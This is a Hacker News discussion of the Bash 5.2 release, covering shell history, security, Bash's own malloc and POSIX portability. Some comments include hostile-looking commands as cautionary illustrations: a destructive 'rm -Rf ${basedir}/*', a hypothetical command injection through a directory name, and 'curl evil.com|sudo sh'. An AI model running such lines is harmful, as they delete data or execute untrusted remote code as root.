Hacker Newsnew | past | comments | ask | show | jobs | submitlogin
Bash 5.2 (case.edu)
185 points by RealAlexClay on Sept 27, 2022 | hide | past | favorite | 123 comments


I had the pleasure of having the original writer of Bash, Brian Fox, at my programming language class in college one time. He was so pleasantly humble. I'll never forget how he said he wrote everything as simply as possible. Gem of a guy


Wow. It's scary to think what if he didn't


We'd be using Ash or Korn


When I've tried it, ksh has seemed decent. I don't know, however, whether that would have been true regardless or if it benefited from competition.


The POSIX shell actually devolved from Korn and bash.

ksh88 worked very hard to compile its data segment in under 64k so it would work on Xenix running on a 286 and similarly constrained systems. The code was sphagetti gymnastics in achieving this.

The POSIX shell standard removed many features of the ksh88 language. It appears that this was done in an attempt to maintain a small footprint, but clarify the code.

This is good for embedded systems, but bad if you need arrays.


As cliche as it sounds, you just kinda had to be there.


In the sense that bash was better than ksh in a way that's difficult to articulate?


More in the sense that at-the-time 'modern'[0] Linux eschewed a new set of tools that displaced/subverted those we used on other systems at the time. They can't be compared subjectively because it ignores a lot of the chronological nuance of the situation. It's not that one shell, or one OS was better than the other though there are objective measurements to prove one vs the other, it's the culmination of the social factors surrounding those societal shifts that resulted in what we now see as the 'better' tool coming out on top. We also cannot disregard the ancillary effects of being the favored shell on what is now the favored platform- more eyes more users more mindshare all helped to accelerate it to where it is now.

I hope that hits the notes you were listenin for.

[0] When I say 'modern' I'm not referring to the Ubuntus and GUI-first distros that we know today.


Humble is not a word that comes to mind when thinking of Brian. Epic-troll is maybe a better one. Now he has pivoted to crypto-coin pumper.


i bet he's a man of multitudes


And I went to school (Case) with the other half of Bash, Chet Ramey. I think Brian focused more on Readline and Chet was more on Posix.


Woah nice.

I use Zsh most of the time, but the OG's of *NIX and POSIX/C bring back the mindset of portability and simplicity. If we only could've leapt from FORTRAN to Rust and skipped C and C++. ;)


That was Ada in 1983. :)


Bash nowadays is developed in git, which is nice. Good luck finding incremental changes, though:

https://git.savannah.gnu.org/cgit/bash.git/commit/?id=74091d...

https://git.savannah.gnu.org/cgit/bash.git/commit/?id=8868ed...

https://git.savannah.gnu.org/cgit/bash.git/commit/?id=d233b4...

(to be fair there are a few smaller patchsets beside these huge dumps; and it does have a good documentation and changelog file). This alone was enough to push me towards fish for my interactive shell needs.


I quickly found the details on a branch called devel.

It looks like Ramey is doing rebasing merges with squashing to get changes into the trunk.

Moreover, there is an intermediate 5.2-test branch which doesn't have the details commits, but is less squashed; it has the 5.2 intermediate pre-releases that were put out for testing.

So there is a method to the madness, though I can't personally agree with anything except all changes on one straight line that you can git bisect with your eyes closed. All those items like 5.2 prerelease 3 can just be tags on one trunk.

Here is a problem: the devel branch has no tags indicating where the various intermediate releases were cut. Likewise, the squash merge commits do not list, in the commit message, the range of commits that were included.


Wow, thanks for the pointer to the devel branch. I retract some of my criticism, this seems to be done fairly properly (except in 2021 when I looked where the commits where basically time dumps). I don't get the need to squash though.


I'm going to open an outright bug on Savannah for this. It's a process problem in the Bash project that I can't go into the detailed devel branch where the acctual commits are, and tell which are the commits that have gone into specific test baselines and releases.

https://savannah.gnu.org/support/index.php?110734




For bash users who are tempted by zsh interactive "fuzzy" completion, here's my take on it: it's directory-aware (offering different suggestions based on your history of commands in that given directory), pure bash code using sqlite to store data: https://github.com/csdvrx/bash-timestamping-sqlite

The only other dependency is fzy for fuzzy matching.


Nice, there's also ble.sh -- a bash replacement of readline that has zsh/fish-like syntax colors and completion. It is actively developed and the maintainer has implemented 2 features I've requested in a matter of hours.

If you want to check it out: https://github.com/akinomyoga/ble.sh

(Still, I personally believe these features are overrated and don't actually bring in more usability or comfort to the command line experience. For instance, ctrl+r kills the need for suggestions and instead of selecting files scrolling through them with your fingers, you can select them using your eyes?)


> there's also ble.sh

I tried. It was a source of inspiration for the looks, because it looks really nice!

However, due to some design decisions ble.sh is slow to the point of being unusable on some hardware I use, including a modern laptop running msys2 instead of WSL2

> For instance, ctrl+r kills the need for suggestions

Use both: seed your history search with the path and a few keywords, then sort by frequency of how often it was the correct or successful complete in the past (meaning it gave you a non error return code)


> slow to the point of being unusable

ble.sh has a vast array of configuration options. By disabling features I didn't like or need I was able to make it run pretty fast and responsive.


Interesting. Maybe I should have tried to configure it better?

In the end, doing a rewrite of the core features allowed me to fine tune the technical choices to work extremely well on Windows (where fork is slow) while adding SQL for both the command history and query format, so hopefully I didn't just reinvent the wheel :)


most of the problems with slowness with these things is that processes are very very heavy on windows compared to linux and take a while to launch.


I’ve asked before on hn and will ask again, I’m sure a bash core dev said something along the lines of ‘if you want a secure shell don’t use bash’, I’d love to see the original quote, and context so I can cite it formally.

To be clear, I think this was in reference to shell shock and not a generic statement. Bash has its place, I think everyone agrees that place isn’t cgi scripts though.


if you want a secure shell don’t use bash

I do not expect a shell to be secure. In my opinion that is the job of mandatory access controls, sandboxes, chroot jails, setcap, posix permissions, etc... and of course the job of the script author.

I do however try to keep shell scripting done with some best practices to minimize mistakes and mistakenly executing the wrong resources. A good start is to use ShellCheck [1] available and a command line tool in most distro repositories. ShellCheck has corrected some of my old bad habits. In the cases where I disagree with ShellCheck findings, there are options that can be added as comments to scripts that will ignore specific checks.

Speaking of security and mistakes, one common mistake I see in scripts is to leave out "set -u" in bash scripts. I actually wish that were default and that one had to disable it when required and it is sometimes required. This would prevent many accidental incidents of data loss. e.g.

    rm -Rf ${basedir}/*  # yeah nobody should do this but it happens, sometimes with sudo.
If the variable basedir is not set, bash will interpret that as rm -Rf /* whereas with 'set -u' in place there will be an error and the script will exit. This is similar to one of the checks in Perl's taint mode.

[1] - https://www.shellcheck.net/


> I do not expect a shell to be secure.

You should. The example with "rm -Rf" is a problem with ergonomics/usability; what definitely would be way more scary is e.g. if the shell had an arbitrary code execution vulnerability in its path processing code.

    $ /bin/sh

    $ cd /some/path+evilmagic+'echo pwned!'  # that's just a normal directory name, allowed by POSIX

    $ /bin/vulnsh  # prints "pwned!"


Those are interesting theoretical examples of phishing or backdoors and they have probably occurred at some point. I've moved away from trying to mitigate theoretical threats and instead I prefer to focus on risk ranking by feasibility or probability based on the potential impact. I believe the onus is on me to review a script and understand it prior to execution and report malicious scripts.

If my job was to mitigate theoretical attacks then I would require everyone to run scripts in highly restricted sandboxes that log the obfuscated behavior. This is probably something that build automation systems should be doing regardless for all scripts and compiled code to detect things like backdoored NPM packages which is all the rage these days. I would also like to see multipurpose repository systems like Github and Gitlab perform these sandboxed tests, rating scripts and compiled code with behavioral risk scores.

I am mostly content with the current status of Bash security and the toggles it gives me to control behavior. There are some things I would prefer defaulted on but I understand why they do not.


These concerns are not theoretical. Complex software has bugs, and Bash doesn't have a perfect track record. https://en.wikipedia.org/wiki/Shellshock_(software_bug)

While my path processing scenario is hypothetical, you shouldn't need additional sandboxing to merely browse the local filesystem. You should trust tar not to overwrite files outside cwd. You should trust ls not to execute arbitrary code when listing a directory. You should trust the TCP/IP stack not to cause a kernel panic when a malformed ping shows up at your NIC. There's a huuuge difference between that and "curl evil.com|sudo sh".


The grammar of the POSIX shell (and derivatives) is not an LR-parsed language that can be implemented with yacc.

It requires an advanced parser.

There is an effort with OCaml (and another with ADA) to create a formal and secure parser. They remark that dash is a handcrafted parser in C that cannot be formally assured.

https://archive.fosdem.org/2018/schedule/event/code_parsing_...

https://archive.fosdem.org/2019/schedule/event/ada_shell/


cgi scripts... now that's a name I haven't heard in a long time...


i disagree. My webserver is written in bash.


Ah yes, one self certified ‘secure’ app proves the language is secure.

I think arguing that you’ll have a hard time arguing that weakly typed, structureless, idiosyncratic language is secure.


it is never the language, it's the implementation. But y'all software "engineers" parrot the same shite since 1989


@jhamby on Twitter is currently refactoring bash to c++, and it's really interesting to read anecdotes about it and read about the progress. It's a really interesting codebase.


link to in-progress source?



why not rust?

(sorry, I had to)


Rust isn't quite portable enough yet. There are lots of small environments or specialized toolchains that are based on gcc that'll compile bash just fine, but once you require Rust, you're eliminating architectures like Alpha (which includes familial descendents like the Shenwei architecture in the Sunway TaihuLight), m68k, SuperH and others.

Rust is getting better, but they're not quite there yet.


c2rust https://github.com/immunant/c2rust :

> C2Rust helps you migrate C99-compliant code to Rust. The translator (or transpiler), c2rust transpile, produces unsafe Rust code that closely mirrors the input C code. The primary goal of the translator is to preserve functionality; test suites should continue to pass after translation.

crust https://github.com/NishanthSpShetty/crust :

> C/C++ to Rust transpiler

"CRustS: A Transpiler from Unsafe C to Safer Rust" (2022) https://scholar.google.com/scholar?q=related:WIDYx_PvgNoJ:sc...

rust-bindgen https://github.com/rust-lang/rust-bindgen/ :

Automatically generates Rust FFI bindings to C (and some C++) libraries

nushell/nushell looks like it has cool features and is written in rust.

awesome-rust > Applications > System Tools https://github.com/rust-unofficial/awesome-rust#system-tools

awesome-rust > Libraries > Command-line https://github.com/rust-unofficial/awesome-rust#command-line

rust-shell-script/rust_cmd_lib https://github.com/rust-shell-script/rust_cmd_lib :

> Common rust command-line macros and utilities, to write shell-script like tasks in a clean, natural and rusty way


hey thanks for this I didn't know it existed. I'm still kind of a rust noob and working my way through Rust in action and various examples.


FYI I wouldn't recommend browsing that guys feed. He has some strange posts on it.


FYI ... I probably never would have gone to look if not for your warning.

https://en.wikipedia.org/wiki/Streisand_effect


That doesn't apply. Streisand effect is for people who want to suppress something. I don't care if you look at that Twitter. I just know that I found it unpleasant, so was just putting a warning out for others.


His posts seem sane to me. The sheer volume of them is a bit weird though.


You would recommend against browsing his feed because some of his posts are "strange"?

Seems like an unnecessary callout.


Thanks for you opinion. Am I allowed to have one as well?


Recommending that other people avoid a certain page because it contains "strange posts" without further elaboration is definitely inviting the "unnecessary callout" remark.

As HackerNews is a discussion site, not your personal blog, some further elaboration on why you consider the guy's posts "strange" (and why you even consider "strange" being a bad thing in itself) would be in order.


You've been quite unspecific in expressing your opinion: how can we evaluate your suggestion of not browsing that guy's feed without actually browsing it to find out what "strange posts" means to you?


what if I find svnpenn strange for such an unspecified callout? Is that wrongthink if I'm unable to get svnpenn's approval?


yes


They are protected, did they just go now?


> a. The bash malloc returns memory that is aligned on 16-byte boundaries.

Why the heck does bash need malloc?


One answer is that it's a tradition for C programs to roll their own malloc.


For systems without one provided.


Maybe I'm misunderstanding the note. Does this mean that the bash source code (written in C, I assume) now uses its own `malloc` function instead of what is provided by the standard C library? Or is it saying that `malloc` is a command I can call in bash?

I assumed the latter, and couldn't figure out why I would need to manually allocate memory in a shell script.


There’s no malloc bash command.

The idea is that you don’t need C libraries to run/compile bash.


I don't think you can compile bash without a libc. The idea is that back in the day systems didn't always come with a good malloc, so bash provided its own. These days, you want --without-bash-malloc on pretty much all modern systems (where "modern" means "last 20 years").

It was a good idea 30+ years ago, maybe. It's really old and crufty code; last time I checked it's all in pre-ANSI C and with workarounds for platforms like 1980s Xenix.


Yes, I think this is accurate:

https://www.gnu.org/software/bash/manual/html_node/Optional-...

> --with-bash-malloc

> Use the Bash version of malloc in the directory lib/malloc. This is not the same malloc that appears in GNU libc, but an older version originally derived from the 4.2 BSD malloc. This malloc is very fast, but wastes some space on each allocation. This option is enabled by default. The NOTES file contains a list of systems for which this should be turned off, and configure disables this option automatically for a number of systems.

> --with-gnu-malloc

> A synonym for --with-bash-malloc.

http://git.savannah.gnu.org/cgit/bash.git/tree/NOTES?h=devel

> Platform-Specific Configuration and Operation Notes [very dated]

> 1. configure --without-gnu-malloc on:

> alpha running OSF/1, Linux, or NetBSD (malloc needs 8-byte alignment;

> bash malloc has 8-byte alignment now, but I have no alphas to test on)

> next running NeXT/OS; machines running Openstep

> all machines running SunOS YP code: SunOS4, SunOS5, HP/UX, if you have problems with username completion or tilde expansion for usernames found via YP/NIS

> linux (optional, but don't do it if you're using Doug Lea's malloc)

> QNX 4.2

> other OSF/1 machines (KSR/1, HP, IBM AIX/ESA)

> AIX

> sparc SVR4, SVR4.2 (ICL reference port)

> DG/UX

> Cray

> Haiku OS

> NetBSD/sparc (malloc needs 8-byte alignment; bash malloc has 8-byte alignment now, but I have no NetBSD machines to test on)

> BSD/OS 2.1, 3.x if you want to use loadable builtins

> Motorola m68k machines running System V.3. There is a file descriptor leak caused by using the bash malloc because closedir(3) needs to read freed memory to find the file descriptor to close


Doesn't this increase scripts attack surface?


Does anyone have a TLDR of major changes or fixes?


The most notable new feature is the rewritten command substitution parsing code, which calls the bison parser recursively. This replaces the ad-hoc parsing used in previous versions, and allows better syntax checking and catches syntax errors much earlier. The shell attempts to do a much better job of parsing and expanding array subscripts only once; this has visible effects in the `unset' builtin, word expansions, conditional commands, and other builtins that can assign variable values as a side effect. The `unset' builtin allows a subscript of `@' or `*' to unset a key with that value for associative arrays instead of unsetting the entire array (which you can still do with `unset arrayname'). There is a new shell option, `patsub_replacement'. When enabled, a `&' in the replacement string of the pattern substitution expansion is replaced by the portion of the string that matched the pattern. Backslash will escape the `&' and insert a literal `&'. This option is enabled by default. Bash suppresses forking in several additional cases, including most uses of $(<file).


That's literally what the link gives! :)


Well they asked for a TL;DR. The link is three pages of dense text and much of it isn't major changes. Seems reasonable for to ask for a summary of the big changes.


Isn't it what the link provides?


Improvements are always nice but portability matters, so depending on new features isn't possible until it could safely be assumed to be ubiquitous (cough, not you Apple).

Then there's the part where building anything of any significant complexity is not probably a good idea in a shell script.


If portability is your primary concern, then you want a POSIX shell, or at least to ensure that your bash is always in POSIX mode. There are lots of behavior differences when bash's POSIX mode is set.

Debian brought the Almquist shell in as /bin/sh, and is maintaining it with strict compliance to POSIX. This displaces bash as the system shell, but bash is still assigned as the interactive shell.

http://gondor.apana.org.au/~herbert/dash/

This is an older standard for the behavior of the POSIX shell. There are many common shell features that are not here (arrays, networking, coprocesses, fancy substitution, and much more). Doing without them increases portability.

https://pubs.opengroup.org/onlinepubs/9699919799/utilities/V...


In my view Debian boiled an ocean for no discernable gain and caused a lot of trouble for everyone in the process. Fedora is using bash and I hope we continue rejecting the mistake Debian made.


If you want to write scripts to target bash, target bash with your shebang.

If your shebang is `/bin/sh`, then it's nice to have a strictly POSIX-compliant shell.


Bash does not "turn off" all its extra functionality when called as /bin/sh, it just alters the behaviors that are clearly in conflict with (what was) POSIX.2.

Arrays are still available in POSIX mode, even though they do not comply.


Which is why I think it’s good that Debian has a POSIX-strict `/bin/sh`. I have no idea what bash’s flawed POSIX mode has to do with this.


Except if any program calls system(3) which always using /bin/sh. I maintain many core Linux packages and this Debian nonsense is a constant irritation with no discernible benefit.


If it doesn’t work with ‘this Debian nonsense’, you’re doing it wrong and you’re contributing to a bad faux dependency on bash as /bin/sh.

The Unix world is better off if there is the option of using another shell that isn’t bug for bug compatible with bash.

This behavior is what leads to systems that have to emulate ancient bloated interfaces because they need to support applications that use apis that are defined as ‘how that program does it’. That’s bad. We should avoid it. Avoiding it is a benefit.


One secondary reason for the dash choice is speed.

The dash shell has been reported to be four times faster than bash.

That definitely impacts boot time. POSIX compliance is not the only benefit.


system("/usr/bin/env bash -c '...'");


Debian dash is useful to keep my scripts honest.

Busybox actually takes dash, and then sprinkles a few bash/korn features back onto it (notibly, not arrays).

If you want a lot of people to use your scripts, getting them working in dash can help a great deal.

The POSIX mode in bash exists because bash itself predates POSIX by nearly a decade.


What does "keep my scripts honest" even mean? Just use bash and don't make everyone else boil your ocean.

It's like saying you'll never use any Linux feature except those strictly defined by POSIX.1. Why would you do that?


Android uses mksh. If I write a script that uses read -p to present a prompt, it will fail on Android because it means coprocess on mksh.

The fundamental reality is that GPL does not run on iOS or Android (in userland). If you want to run scripts on those platforms (and they are ENORMOUS), then you cannot use bashisms.

Full stop.


Note: BusyBox has two shell implementations in it, selected at compile time.


Are you building scripts for the Debian distro? Given that they already include bash and actually support it for interactive use, what would be the issue for you scripting using bash? I am sure that the experience of moving to dash wasn't fun at all. But users in general are not affected that much as far as I understand.


I'm maintaining a bunch of core Linux packages which have had to make many adjustments over years for dealing with this Debian nonsense. I can see no justification for it since Fedora is using bash just fine and doesn't have to deal with this.


I definitely feel great sympathy for your position.


>There are lots of behavior differences when bash's POSIX mode is set.

AFAIU correct POSIX scripts will behave correctly with Bash POSIX mode. Incorrect POSIX scripts will not behave incorrectly with Bash POSIX mode as one might expect with a more faithful shell implementation.

IMO Bash POSIX mode is not a problem for running scripts, although you should test your scripts using a strictly shell implementation if you will then distribute those scripts to other users/platforms.


Serious question, why should I care about portability to Apple in shell scripts?

Why not make all your shell scripts #!/bin/bash and anything where that doesn't work is trying to be a second class citizen[1] in unix and so maybe let them? Or tell users to install Bash - which they can probably do if they're using shell scripts..?

[1] Or maybe deliberately trying to break portability by market power abuse.

I know I don't need tell anybody here that Apple is not their friend, merely a supplier who will maximize their revenue at your expense when it suits them.


> Serious question, why should I care about portability to Apple in shell scripts?

It depends on your target audience, of course, but Darwin is one of the major current OSs and wanting to support it is reasonable.

> Why not make all your shell scripts #!/bin/bash and anything where that doesn't work is trying to be a second class citizen[1] in unix and so maybe let them? Or tell users to install Bash - which they can probably do if they're using shell scripts..?

Well, for starters AFAIK /bin/bash on Darwin will give you bash 3.2, which is a bit old and feature-poor. Of course you can (and perhaps even should) simply install a new version but then it won't be at /bin/bash, it'll be under /usr/local or /opt or whatever. And BASH isn't POSIX so I'd personally argue that trying to force it makes your stuff the "second class citizen in unix".

Honestly I'm not sure what position you're trying to argue. "Ignore the second biggest desktop OS because they don't ship the latest version of the non-standard scripting language I like"?


>"Ignore the second biggest desktop OS because they don't ship the latest version of the non-standard scripting language I like"?

There's nothing wrong with that position. Bash is not a "non-standard scripting language people like", it is the de-facto standard on Linux (heck, it was the first program Torvalds ever run on Linux) and the most widespread implementation of POSIX shell in the world. If Apple chosed tivoization[1] over freedom, so I can choose the #!/bin/bash shebang.

[1] https://en.m.wikipedia.org/wiki/Tivoization


> Bash is not a "non-standard scripting language people like", it is the de-facto standard on Linux (heck, it was the first program Torvalds ever run on Linux)

That sounds like the definition of not being standardized. BASH is the most common shell implementation on GNU systems (no, not Linux; Alpine is a Linux, and so is Android), but that doesn't make it a standard, only common. It's like claiming that nobody should care about anything but Chrome because it's "the de-facto standard".

> and the most widespread implementation of POSIX shell in the world.

BASH can run POSIX sh scripts, but POSIX sh can't run BASH scripts. If you're only using POSIX features, then it's not a problem, but if you're only using POSIX features we wouldn't be having this argument.

> If Apple chosed tivoization[1] over freedom, so I can choose the #!/bin/bash shebang.

Could I at least talk you into using `#!/usr/bin/env bash` so your scripts will work on a wider slice of the Linux universe? Even on Linux distros that exact path isn't a given (guix and nix send their regards), and you're completely breaking compatibility with the BSDs and illumos distros.


> Could I at least talk you into using `#!/usr/bin/env bash` so your scripts will work on a wider slice of the Linux universe? Even on Linux distros that exact path isn't a given (guix and nix send their regards), and you're completely breaking compatibility with the BSDs and illumos distros.

You're also breaking compatibility with newer versions of bash on macOS that almost definitely wouldn't be installed at /bin/bash. I use 5.2 from brew.


bash isnt posix???

if bash isnt posix then wth is? if you told me "British English isnt actually English" I'd be less surprised than bash and posix.


> bash isnt posix???

No

> if bash isnt posix then wth is?

POSIX sh (https://pubs.opengroup.org/onlinepubs/9699919799/utilities/V...).


POSIX defines a shell that's not completely compatible with Bash. IIRC Ubuntu's `sh` command actually runs bash in a special "POSIX-compatible" mode that's really bare-bones.


> Why not make all your shell scripts #!/bin/bash

Because it's not always installed there. See, for example, FreeBSD where bash typically lives in /usr/local/bin/bash. Or in the Linux world, Nix and Guix.

Use "#!/usr/bin/env bash" to account for all these possibilities.


If we're going to be pedantic, env doesn't have to be installed at /usr/bin/env either. See https://www.felesatra.moe/blog/2021/07/03/portable-bash-sheb...


i cant remember where I saw it now, or what the main argument was, but I remember reading a rather authoritative article recommending against the env approach, and recommending people stick to #!/bin/bash regardless of the above, otherwise valid point.

Dunno if anyone here with a better memory remembers the article to link here ...



You should care about POSIX Shell Command Language compatibility because targeting anything above that will eventually require you to do more, not less, work.

If you haven't run into this, you just haven't written enough for the shell yet.

Once you run into it, you'll not want to write anything specifically for Bash or Zsh anymore unless you know beyond a shadow of a doubt that it will never be run in any other shell.


Nearly all of the shell scripts ever written don't need to run on Linux, and BSD, and Mac, and/or whatever esoteric Unixes that are still out there.

If you are writing a shell script with the intention of running in many places, fine.

But if you do that, the POSIX compatibility will be the least of your worries.


A few "gotchas:"

I will commonly "alias p=printf" in my shell scripts. This is fine in Almquist and bash when called as /bin/sh, but if called as /bin/bash it fails, because bash only honors aliases in POSIX mode.

In bash, reading with a prompt can be done with "read -p prompt var" but this fails in Korn because it's used for coprocesses. This means that your shell script will not run on Android, because mksh is the system shell.

I could probably think of a few more with some effort, and especially a check of the man pages.

p.s. I didn't downvote you.


> bash only honors aliases in POSIX mode.

Aliases certainly _work_ in bash (even when not in POSIX mode. What do you mean by "honors"?


Bash will not expand aliases within a shell script unless it is in POSIX mode.

When not in POSIX mode, aliases are only expanded for interactive use.

  $ echo '#!/bin/sh \n alias p=printf \n p %s\\\\n "hello world!"' > ok.sh
  $ chmod 755 ok.sh
  $ ./ok.sh
  hello world!

  $ echo '#!/bin/bash \n alias p=printf \n p %s\\\\n "hello world!"' > nope.sh
  $ chmod 755 nope.sh
  $ ./nope.sh 
  ./nope.sh: line 3: p: command not found


Wat? I suggest to leave such emotions out of your choice of programming languages and other decisions that should be dictated by rationality. Not adhering to POSIX shell syntax buys you very, very little, but can only create problems down the road. Bash isn't even the standard non-interactive shell on mainstream Linuxen (eg Debian uses dash), and zsh is not only used on Mac OS.

[1]: https://wiki.debian.org/Shell


Serious answer, because I have users/customers who I care about that use that platform, and sometimes I use it myself. A world built on absolutes falls to pieces really quickly.


It's okay. Portability depends on the behavior of the developers on average, not the rate of new features added to a language. Bash developers are generally conservative and not going to be using the newest backwards incompatible features for at least a decade. Whereas, say, Rust dev demographics are more bleeding edge types and when they get new features they use them immediately.

That's why bash scripts can be interpreted on any OS from 1995 to now and Rust can only be compiled on an OS which has updated it's rustc in the last 3 months.

Gotta hand it to Bash devs. They do a good job.


> That's why bash scripts can be interpreted on any OS from 1995 to now and Rust can only be compiled on an OS which has updated it's rustc in the last 3 months.

You can get the same effect by trying to run scripts with bash 5.x features on a version of bash from 1995.

Rust code since 1.0 has the same level of backwards compatibility that bash does.


>Rust code since 1.0 has the same level of backwards compatibility that bash does.

That's true and exactly what I said. It's the rust developer demographic that lacks the consideration to write backwards compatible code.


I'm not sure the message is being conveyed properly -- looking up the GNU archive, it seems Bash 1.14 was the current release in 1995. Are people still making sure their scripts are compatible in Bash 1.14? Surely there's a subset of scripts that happen to work, but with numerous features that have been added since, there are plenty of scripts that won't.

Backwards compatibility isn't really about whether you can run code on _old versions_, but if you can run _old code_ on new versions. Scripts that were written with Bash 1.14 should work today (barring all the other external dependencies they may have...), but scripts that are written today won't necessarily work on 1.14.

That's the same as the Rust analogy: code written with Rust 1.0 should compile and run today, but code written today won't necessarily work on Rust 1.0 (albeit, there must be a subset of new code that would happen to work).


>Backwards compatibility isn't really about whether you can run code on _old versions_, but if you can run _old code_ on new versions.

Ah, sorry, I guess I mean forwards compabitibility then. The ability to interpret/compile code written by devs today on machines with software from years ago (or months ago in rust's case).


For several projects, we simply define bash as a required dependency. All the bash scripts use "#!/usr/bin/env bash". Not had any issues with portability between versions of bash, and basically every platform we care about has bash at least as an alternative if not the default.


There are circumstances in which portability is not required. People have been writing bash before Apple picked it up and people keep writing bash despite Apple getting sent to GNUlag by GPLv3.


Shared shell-scripts are only one side of the coin. The other is interactive use (incl. one's .bash_profile etc), where it doesn't matter what anyone else's system does or doesn't have installed.


Portability for shell scripts is over rated in 2022.

If your shell scripts are small, it's easy to write several versions of them.

It they are long, you should use something else than shell scripts for your program, like python.

Worse case scenario, provision the same interpretter everywhere, vendor it, or use a compiled language.

There are some edge cases where portability makes sense (e.g: you are scripting for an heterogeneous parc of routers), but they are niche usages most companies don't care about.


Because pulling in a huge python installation on small/embedded systems is fun, just because some people are unable to keep their scripts POSIX compliant


Scripting in bash in a portable manner on embedded system is exactly the niche use cases I talked about. The router example is aimed at it, because it's the right size ratio to be small, but have an OS running.

Still, the vast majority of IT projects do not fall in that category.

It exists, but it's a very, very small % of why you need a bash script. And in fact, even those advocating for bash portability almost never fall into the category of people that have to do it in their daily job.

I'll go even further and even state that a lot of embedded system don't even have bash scripting capabilities in the first place.


Tcl, lua, or a lisp/scheme work well here


The nice thing is that many, many shells implement POSIX, so there is enormous portability.

Busybox bundles the Almquist shell, and there is a Windows port available. This is the easiest and least intrusive way to run shell scripts on Windows.

Busybox advertises that it bundles bash, but this is not true - it's Almquist with some added bashisms.

It also bundles their own awk implementation, but not Tcl/lua/lisp/scheme.


It’s not the compatibility which is the problem, but the 3 bugs/line that bash causes.


If you cannot take the time to learn the language, what makes you so confident your python doesn't also have 3 bugs per line as well?


Did you run shellcheck on it, to actually recognize all the errors, before you assumed it is correct?


Writing bash scripts is really not that difficult - despite what folks might want to convince you of.

ShellCheck is a great tool, yes, and can be run natively inside your IDE. Just like any language, you need to learn the language and learn it's tools.

Blanket statements like "write all your scripts in python because there's less bugs" really just means the commenter is more familiar with python. Do enough script writing and you'll realize how absurd that statement is.

It's a lot like the folks that scream nobody should ever write a single line of C or C++ because it's "dangerous" - yet untold number of lines of C/C++ are written every day. A pencil can be dangerous in the wrong hands...


Yes I did. And I hope you ran mypy on yours.

BTW both shellcheck and mypy are equally optional, so I'm not sure what your high horse is about.


Well I use both extensively, and I'm very confident that I can write a script of 1000 lines with much less bug and much better error handling that in bash, in half the time it would take me.

In fact, as soon as you need to use arrays, it's game over.


1000 lines in python is a bash oneliner and planning for failure is bad design.

>In fact, as soon as you need to use arrays, it's game over.

Why?

PS. comfortable with both. I don't draw lines based on LOC or arrays.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: